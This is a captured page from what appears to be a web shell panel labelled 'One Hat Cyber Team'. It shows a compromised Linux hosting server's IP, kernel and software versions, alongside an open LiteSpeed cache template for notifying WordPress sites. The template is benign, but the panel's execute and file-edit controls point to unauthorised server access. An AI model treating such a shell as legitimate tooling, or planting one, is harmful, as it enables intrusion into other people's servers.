⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.140
Server IP:
68.65.123.197
Server:
Linux premium49.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
lsws
/
add-ons
/
webcachemgr
/
src
/
View
/
Tpl
/
Edit File: MassDashNotifyProgress.tpl
viewModel->getTplData(ViewModel::FLD_ICON); $installsCount = $this->viewModel->getTplData(ViewModel::FLD_INSTALLS_COUNT); $d = array( 'title' => 'Mass Notifying All Discovered WordPress Installations...', 'icon' => $icon ); $this->loadTplBlock('Title.tpl', $d); ?>
Attempting to notify
0
out of
...
Currently attempting to notify all discovered WordPress installations. Installations detected with "Error" status or containing a '.dash_notifier_bypass' file will be bypassed. Please be patient.
0
WordPress installation(s) bypassed.", "Dash Notifier notified
0
WordPress installation(s).", "Dash Notifier failed to notify
0
WordPress " . "installation(s)." ); $d = array( 'msgs' => $msgs, 'class' => 'msg-info', ); $this->loadTplBlock('DivMsgBox.tpl', $d); $d = array( 'back' => 'OK', 'backDo' => 'dash_notifier', 'visibility' => 'hidden' ); $this->loadTplBlock('ButtonPanelBackNext.tpl', $d); ?>
Error Messages
0
'errMsgs', 'class' => 'scrollable', ); $this->loadTplBlock('DivMsgBox.tpl', $d); ?>
Success Messages
0
'succMsgs', 'class' => 'scrollable', 'title' => 'Success Messages:', ); $this->loadTplBlock('DivMsgBox.tpl', $d); ?>
Simpan